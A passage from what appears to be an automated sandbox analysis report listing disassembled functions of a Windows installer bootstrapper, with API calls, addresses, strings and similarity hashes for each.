                                                                                                                                                                    • Opcode Fuzzy Hash: e397894ee51d9c0fe791c7f8fa18779759055e0e9559e57ea5a1681f020717f9
                                                                                                                                                                    • Instruction Fuzzy Hash: 6E21B072941229FFDF129E90EC0AFAFBB78EF44315F104059F910A6190EB759A20EB90
                                                                                                                                                                    Function 00903B15 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74memoryCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,80004005,00000000,00000000,00000100,?,00901474,00000000,80004005,00000000,80004005,00000000,000001C7,?,009013B8), ref: 00903B33
                                                                                                                                                                    • HeapReAlloc.KERNEL32(00000000,?,00901474,00000000,80004005,00000000,80004005,00000000,000001C7,?,009013B8,000001C7,00000100,?,80004005,00000000), ref: 00903B3A
                                                                                                                                                                      • Part of subcall function 0090394F: GetProcessHeap.KERNEL32(?,000001C7,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903960
                                                                                                                                                                      • Part of subcall function 0090394F: RtlAllocateHeap.NTDLL(00000000,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903967
                                                                                                                                                                      • Part of subcall function 00903BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,009021CC,000001C7,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903BDB
                                                                                                                                                                      • Part of subcall function 00903BD3: HeapSize.KERNEL32(00000000,?,009021CC,000001C7,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903BE2
                                                                                                                                                                    • _memcpy_s.LIBCMT ref: 00903B86
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$Process$AllocAllocateSize_memcpy_s
                                                                                                                                                                    • String ID: memutil.cpp
                                                                                                                                                                    • API String ID: 3406509257-2429405624
                                                                                                                                                                    • Opcode ID: 4dbd4c72e265171011b9060f10ec6a543aaff9867413428653ce50235169977d
                                                                                                                                                                    • Instruction ID: 0f7ab69e9884636633447866ca0dfc2855bf55834e24731bad99eb4509474454
                                                                                                                                                                    • Opcode Fuzzy Hash: 4dbd4c72e265171011b9060f10ec6a543aaff9867413428653ce50235169977d
                                                                                                                                                                    • Instruction Fuzzy Hash: 7A11E131604518AFCB226E68CC48E7E3B5E9F81728B05C225FC149B2E2E775CF1092D0
                                                                                                                                                                    Function 0094894D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70timeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00948991
                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009489B9
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 009489C3
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastTime$FileSystem
                                                                                                                                                                    • String ID: inetutil.cpp
                                                                                                                                                                    • API String ID: 1528435940-2900720265
                                                                                                                                                                    • Opcode ID: 4f8c5ffa3a13a5f9c51d560ac3defbdd90917f73a6c75640055968168c21f05a
                                                                                                                                                                    • Instruction ID: aa207b4197cc4a5bce9f7861eb8a27dde5242f42bfa222ceca5994f92e99e1d7
                                                                                                                                                                    • Opcode Fuzzy Hash: 4f8c5ffa3a13a5f9c51d560ac3defbdd90917f73a6c75640055968168c21f05a
                                                                                                                                                                    • Instruction Fuzzy Hash: 2411D037A1153ABBD320DAA9CC45FBFBBACAB44750F110525EE40FB240EA60DD0096E2
                                                                                                                                                                    Function 00913AA6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00940F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0096AAA0,00000000,?,009457E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00940F80
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,00913FB5,feclient.dll,?,00000000,?,?,?,00904B12), ref: 00913B42
                                                                                                                                                                      • Part of subcall function 009410B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0094112B
                                                                                                                                                                      • Part of subcall function 009410B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00941163
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: QueryValue$CloseOpen
                                                                                                                                                                    • String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer$feclient.dll
                                                                                                                                                                    • API String ID: 1586453840-3596319545
                                                                                                                                                                    • Opcode ID: e008f1558283147c9735c6f6cf76c029fecba8053d2beadd09ecc11371e1e147
                                                                                                                                                                    • Instruction ID: 623d94f46a4558035997f91ebcdfa42844aa7123543a4157043fa53af3b87fa6
                                                                                                                                                                    • Opcode Fuzzy Hash: e008f1558283147c9735c6f6cf76c029fecba8053d2beadd09ecc11371e1e147
                                                                                                                                                                    • Instruction Fuzzy Hash: 0F119336B8420CBBDB21DA95EC82EFABBBCEB50741F408065E501AB051E6719FC1D710
                                                                                                                                                                    Function 00940764 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63filestringCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrlenA.KERNEL32(009212CF,00000000,00000000,?,?,?,00940013,009212CF,009212CF,?,00000000,0000FDE9,?,009212CF,8007139F,Invalid operation for this state.), ref: 00940776
                                                                                                                                                                    • WriteFile.KERNEL32(FFFFFFFF,00000000,00000000,?,00000000,?,?,00940013,009212CF,009212CF,?,00000000,0000FDE9,?,009212CF,8007139F), ref: 009407B2
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00940013,009212CF,009212CF,?,00000000,0000FDE9,?,009212CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 009407BC
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastWritelstrlen
                                                                                                                                                                    • String ID: logutil.cpp
                                                                                                                                                                    • API String ID: 606256338-3545173039
                                                                                                                                                                    • Opcode ID: 37d7f2e1e387839d45fdbff30282dfdd54da44cbd7f26504e8a0464c1704537d
                                                                                                                                                                    • Instruction ID: 3f61e11e1cd73f8e834ed310ec3374813cb2737e22b7a70734f27740b242a372
                                                                                                                                                                    • Opcode Fuzzy Hash: 37d7f2e1e387839d45fdbff30282dfdd54da44cbd7f26504e8a0464c1704537d
                                                                                                                                                                    • Instruction Fuzzy Hash: 64118A76955125ABC7109B698D44EABBA6CEBC5761B114214FE01E7140E770ED00DEE1
                                                                                                                                                                    Function 0090120A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 62COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,0090523F,00000000,?), ref: 00901248
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,0090523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00901252
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ArgvCommandErrorLastLine
                                                                                                                                                                    • String ID: apputil.cpp$ignored
                                                                                                                                                                    • API String ID: 3459693003-568828354
                                                                                                                                                                    • Opcode ID: 3141c7bef91a3af59273f6f921f1a43c2a03da7045e391242d184c11debb666a
                                                                                                                                                                    • Instruction ID: 6c352f271c3664b5140942847607dfb0f67b7b5c07baf9c149bd30d758a03640
                                                                                                                                                                    • Opcode Fuzzy Hash: 3141c7bef91a3af59273f6f921f1a43c2a03da7045e391242d184c11debb666a
                                                                                                                                                                    • Instruction Fuzzy Hash: EC113A76901629EFCB21DB99C805EAEBBECAF85B50B114195BD14E7290E630DE00DAA0
                                                                                                                                                                    Function 0092D1B3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58synchronizationCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,00000002,00000000,?,?,0092D3EE,00000000,00000000,00000000,?), ref: 0092D1C3
                                                                                                                                                                    • ReleaseMutex.KERNEL32(?,?,0092D3EE,00000000,00000000,00000000,?), ref: 0092D24A
                                                                                                                                                                      • Part of subcall function 0090394F: GetProcessHeap.KERNEL32(?,000001C7,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903960
                                                                                                                                                                      • Part of subcall function 0090394F: RtlAllocateHeap.NTDLL(00000000,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903967
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to allocate memory for message data, xrefs: 0092D212
                                                                                                                                                                    • NetFxChainer.cpp, xrefs: 0092D208
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocateMutexObjectProcessReleaseSingleWait
                                                                                                                                                                    • String ID: Failed to allocate memory for message data$NetFxChainer.cpp
                                                                                                                                                                    • API String ID: 2993511968-1624333943
                                                                                                                                                                    • Opcode ID: 84596a2b079d82d43c584cb9a3670d2b1834b2d48d9571685a143a64c193e703
                                                                                                                                                                    • Instruction ID: 5846202783e79e17b5b6d2afc569b8213b79c960ee4abb507718d8919907dac6
                                                                                                                                                                    • Opcode Fuzzy Hash: 84596a2b079d82d43c584cb9a3670d2b1834b2d48d9571685a143a64c193e703
                                                                                                                                                                    • Instruction Fuzzy Hash: C21191B5300225EFCB199F68E885E5AB7F8FF89724B104165F9249B3A1C771EC10CB94
                                                                                                                                                                    Function 00901F69 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • FormatMessageW.KERNEL32(0090428F,0090548E,?,00000000,00000000,00000000,?,80070656,?,?,?,0091E75C,00000000,0090548E,00000000,80070656), ref: 00901F9A
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,0091E75C,00000000,0090548E,00000000,80070656,?,?,009140BF,0090548E,?,80070656,00000001,crypt32.dll), ref: 00901FA7
                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00000000,00000000,?,?,?,0091E75C,00000000,0090548E,00000000,80070656,?,?,009140BF,0090548E), ref: 00901FEE
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                                                    • String ID: strutil.cpp
                                                                                                                                                                    • API String ID: 1365068426-3612885251
                                                                                                                                                                    • Opcode ID: d805dd365c056c33b6481735e7a9cae05ae624e7856d188d008795f6fda44d4c
                                                                                                                                                                    • Instruction ID: 4ac4539d18436306ceaf085fb7da832f2b4118891786a1273fc1198b4d2aa316
                                                                                                                                                                    • Opcode Fuzzy Hash: d805dd365c056c33b6481735e7a9cae05ae624e7856d188d008795f6fda44d4c
                                                                                                                                                                    • Instruction Fuzzy Hash: C0018EB691012ABFDB208F94CC09EDEBBACEB04710F004165BE00E6290E7709E009AE0
                                                                                                                                                                    Function 00910721 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00940F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0096AAA0,00000000,?,009457E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00940F80
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,00000001,00000000), ref: 00910791
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to update name and publisher., xrefs: 0091077B
                                                                                                                                                                    • Failed to update resume mode., xrefs: 00910762
                                                                                                                                                                    • Failed to open registration key., xrefs: 00910748
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseOpen
                                                                                                                                                                    • String ID: Failed to open registration key.$Failed to update name and publisher.$Failed to update resume mode.
                                                                                                                                                                    • API String ID: 47109696-1865096027
                                                                                                                                                                    • Opcode ID: a8b16fefd3c69837744584523c994f04cec4940c89add246bde3fce7f2f62d52
                                                                                                                                                                    • Instruction ID: e37e80509c5f7f2381f1fd1d0c681a31bc5916e6e0dfee2cbcde3088f4931f18
                                                                                                                                                                    • Opcode Fuzzy Hash: a8b16fefd3c69837744584523c994f04cec4940c89add246bde3fce7f2f62d52
                                                                                                                                                                    • Instruction Fuzzy Hash: 52018D32A4162CFBCB229694DC42FEE7769AB90725F100155F900B6190D7B2BE90A7D0
                                                                                                                                                                    Function 00944DB3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNEL32(0094B500,40000000,00000001,00000000,00000002,00000080,00000000,009104BF,00000000,?,0090F4F4,?,00000080,0094B500,00000000), ref: 00944DCB
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090F4F4,?,00000080,0094B500,00000000,?,009104BF,?,00000094,?,?,?,?,?,00000000), ref: 00944DD8
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,0090F4F4,?,0090F4F4,?,00000080,0094B500,00000000,?,009104BF,?,00000094), ref: 00944E2C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                                    • String ID: fileutil.cpp
                                                                                                                                                                    • API String ID: 2528220319-2967768451
                                                                                                                                                                    • Opcode ID: b4c8fa10804708e92c210b8d0a93c9777feda117a24cadbb67057f9676d6b840
                                                                                                                                                                    • Instruction ID: 46cba3850d4cb6467af16fce7c1a49c27c22a13904e0c5bfb44a253b0258bdee
                                                                                                                                                                    • Opcode Fuzzy Hash: b4c8fa10804708e92c210b8d0a93c9777feda117a24cadbb67057f9676d6b840
                                                                                                                                                                    • Instruction Fuzzy Hash: BF01F233641525ABD7325A699C09F5F7A58BB81B71F124310FF20AB1E0E770DC01A7E0
                                                                                                                                                                    Function 0094497A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,00000080,00000001,00000000,00000003,00000080,00000000,000002C0,00000000,?,00928C76,00000000,00000088,000002C0,BundleCachePath,00000000), ref: 009449AE
                                                                                                                                                                    • GetLastError.KERNEL32(?,00928C76,00000000,00000088,000002C0,BundleCachePath,00000000,000002C0,BundleVersion,000000B8,000002C0,EngineVersion,000002C0,000000B0), ref: 009449BB
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateErrorFileLast
                                                                                                                                                                    • String ID: fileutil.cpp
                                                                                                                                                                    • API String ID: 1214770103-2967768451
                                                                                                                                                                    • Opcode ID: bc3880e7ee722a64ba321984652b5807f35ec9337bc77f8ad9d36647c76dca04
                                                                                                                                                                    • Instruction ID: d3740585cafcd0a7c649db78613e850d4eecc50c36f934abc4a69ad4ef38aa39
                                                                                                                                                                    • Opcode Fuzzy Hash: bc3880e7ee722a64ba321984652b5807f35ec9337bc77f8ad9d36647c76dca04
                                                                                                                                                                    • Instruction Fuzzy Hash: 1401F437690134BBE72126A5AC0AF6F6A5CAB41F71F118221FF85BA2C0D7658D00B2E0
                                                                                                                                                                    Function 00926BEB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49serviceCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ControlService.ADVAPI32(00926AFD,00000001,?,00000001,00000000,?,?,?,?,?,?,00926AFD,00000000), ref: 00926C13
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00926AFD,00000000), ref: 00926C1D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ControlErrorLastService
                                                                                                                                                                    • String ID: Failed to stop wusa service.$msuengine.cpp
                                                                                                                                                                    • API String ID: 4114567744-2259829683
                                                                                                                                                                    • Opcode ID: 1e3dc5369cd8817b4035594fd27616eeacfb62b42690e537948178c7b9f02b3b
                                                                                                                                                                    • Instruction ID: 5c225bef44f1f3c83cf12d767b942dc5da4be7b954bb304c92fc228b1eea18b0
                                                                                                                                                                    • Opcode Fuzzy Hash: 1e3dc5369cd8817b4035594fd27616eeacfb62b42690e537948178c7b9f02b3b
                                                                                                                                                                    • Instruction Fuzzy Hash: 29014433B4523867D730EB65AC05FAF77A8DF48721F014129FE40BB180DA749C0146E4
                                                                                                                                                                    Function 009439AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 009439F4
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00943A27
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$AllocFree
                                                                                                                                                                    • String ID: `<u$xmlutil.cpp
                                                                                                                                                                    • API String ID: 344208780-3482516102
                                                                                                                                                                    • Opcode ID: 9e4b64d75f6d2165cfd584d628a7b727d7c86b5abab9520445fab3696fae8d01
                                                                                                                                                                    • Instruction ID: 3f3347619dc4eb9b527fcd31936404d2c73aa9944a5a2b5690340eebe238c00f
                                                                                                                                                                    • Opcode Fuzzy Hash: 9e4b64d75f6d2165cfd584d628a7b727d7c86b5abab9520445fab3696fae8d01
                                                                                                                                                                    • Instruction Fuzzy Hash: 97016235645215BBD7205AAA9C09F6B76DCDF86764F108565FC44A7380D6B8CE009690
                                                                                                                                                                    Function 00943929 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 0094396E
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 009439A1
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$AllocFree
                                                                                                                                                                    • String ID: `<u$xmlutil.cpp
                                                                                                                                                                    • API String ID: 344208780-3482516102
                                                                                                                                                                    • Opcode ID: 793a9561ad629c099dab8a3f38adb7ab069b8c22a6f87b0d2937c0838527a4bd
